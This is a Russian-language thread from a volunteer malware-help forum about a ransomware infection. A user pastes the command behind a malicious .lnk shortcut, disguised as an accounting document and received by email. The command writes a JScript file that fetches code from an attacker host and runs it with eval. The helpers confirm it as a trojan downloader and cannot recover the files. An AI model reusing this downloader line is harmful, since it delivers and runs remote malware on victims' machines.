Здравствуйте! Прежде чем обратиться за помощью, интересует вопрос возможна ли в принципе расшифровка?
Screenshot_1.pngScreenshot_2.png
Заранее спасибо!
Здравствуйте! Прежде чем обратиться за помощью, интересует вопрос возможна ли в принципе расшифровка?
Screenshot_1.pngScreenshot_2.png
Заранее спасибо!
Уважаемый(ая) Qsag, спасибо за обращение на наш форум!
Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Пришлите несколько зашифрованных файлов.
+ выполните http://virusinfo.info/pravila.html
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Зашифровались вчера?
Скрипт, который запустили перед шифрованием, сохранился?
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Вчера.
Достоверно не известно, какие именно действия предшествовали зашифровке данных. Есть предположение, что письмо приведенное в скриншоте ниже и есть зловред, так как пользователю адресат не известен и подобного рода документ не ожидался.
Screenshot_3.png
Да, это он.
Заархивируйте с паролем virus (в имени архива не должно быть символов кириллицы) и пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.
Странные пользователи, конечно, которые открывают невесть что от незнакомых адресатов
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Возможно из за не хватки опыта с моей стороны, мне не удается добавить .lnk в avz и подготовить его для отправки. Что я делаю не так и возможно ли отправить его обычным .zip архивом?
Следовал ниже приведенной инструкции:
Screenshot_4.png
Так я и рассчитывал, что архивировать будете обычным архиватором
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Ярлык имеет следующие путь
%windir%\system32\cmd.exe /c echo. 2>k.js&echo var l = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");l.open(" GET","http://load-the-attach.com/scr/scr",false);l.send^(^);var p = l.responseText;eval^(p^);>k.js&k.js
Рабочая папка %temp%
- - - - -Добавлено - - - - -
Залил )
Теперь ожидайте. Возможно сервер злодеев еще активен и удастся выудить ключ
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Удастся помочь?
Увы, нет
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 1
- В ходе лечения обнаружены вредоносные программы:
- \список документов для подтверждения трат_согласовано главным бухгалтером.doc_cdhn_doc_.lnk - Trojan-Downloader.WinLNK.Small.w
Уважаемый(ая) Qsag, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.